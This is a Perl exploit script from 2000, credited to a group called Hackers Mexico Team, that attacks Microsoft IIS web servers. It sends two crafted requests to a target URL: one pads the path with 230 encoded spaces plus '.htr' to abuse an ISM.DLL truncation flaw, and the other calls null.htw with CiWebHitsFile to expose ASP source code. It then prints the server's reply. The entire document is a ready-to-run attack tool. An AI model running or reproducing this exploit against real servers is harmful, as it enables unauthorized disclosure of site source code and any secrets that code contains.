#!/usr/bin/perl
#---------------------------------------------------------------------#
# [ISM y ASP] Internet Information Server Buffer Overflow             #
# IIS ASP codigo para ver si es usado el ISM.DLL (buffer overflow)    #
# y el  null.htw bug                                                  #
# Hackers Mexico Team 08/09/2000                                      #
# Realizado por Radikall radikall@hackers-mexico.org                  #
#---------------------------------------------------------------------#
# Salu2 a Mulder <-- a hmt memb.                    	              #
#---------------------------------------------------------------------#
# Copyright 2000   http://www.hackers-mexico.org                      #
#---------------------------------------------------------------------#

use Socket;

$port=80;

if (!($ARGV[0])) {
  print "\n[ISMyASP]\n";
  print "$0 http://host/view.asp \n";
  print "Hackers Mexico Team.\n";
  exit;
}

$url=$ARGV[0];

chop($url) if $url =~ /\n$/;
print "url: $url\n";

$remote = $url;
$remote =~ s/http\:\/\///g;
$remote =~ s/\/([^>]|\n)*//g;
print "host: $remote\n";

$path = $url;
$path =~ s/http\:\/\///g;
$path =~ s/$remote//g;
print "path: $path\n";


$spaces=230; #ESTE ES EL VALOR DE DEFAULT DEL ARCHIVO ISM.DLL b.t
             #RECUERDA ESTE ATAQUE SOLO FUNCIONA 1 VEZ
             #LEE THE CERBERUS CISADV000327.

$submit = "GET $path";

$i=0;
while($i < $spaces)
{
   $submit= "$submit%20";
   $i++;

}
$submit= "$submit.htr HTTP/1.0\n\n";

print "======Trying ism.dll buffer truncation...\n";
print "submit: $submit\n\n";

&post_message;

print "======Trying null.htw...\n";
$submit="GET 
/null.htw?CiWebHitsFile=$path%20&CiRestriction=none&CiHiliteType=Full 
HTTP/1.0\n\n";
print "submit: $submit\n\n";

&post_message;

sub post_message
{
   if ($port =~ /\D/) { $port = getservbyname($port, 'tcp'); }
   die("No port specified.") unless $port;
   $iaddr = inet_aton($remote) || die("Fallo al buscar el Host: $remote");
   $paddr = sockaddr_in($port, $iaddr);
   $proto = getprotobyname('tcp');
   socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die("Fallo para abrir 
sockets: $!");
   connect(SOCK, $paddr) || die("No se puede conectar: $!");
   send(SOCK,$submit,0);
   printf "\n======Waiting for reply [pray]....\n\n";
   while(<SOCK>) {
      print $_;
   }
   close(SOCK);
}

print "\n\n======FIN.   [Hackers Mexico Team]\n";
exit;
#:) radikall@hackers-mexico.org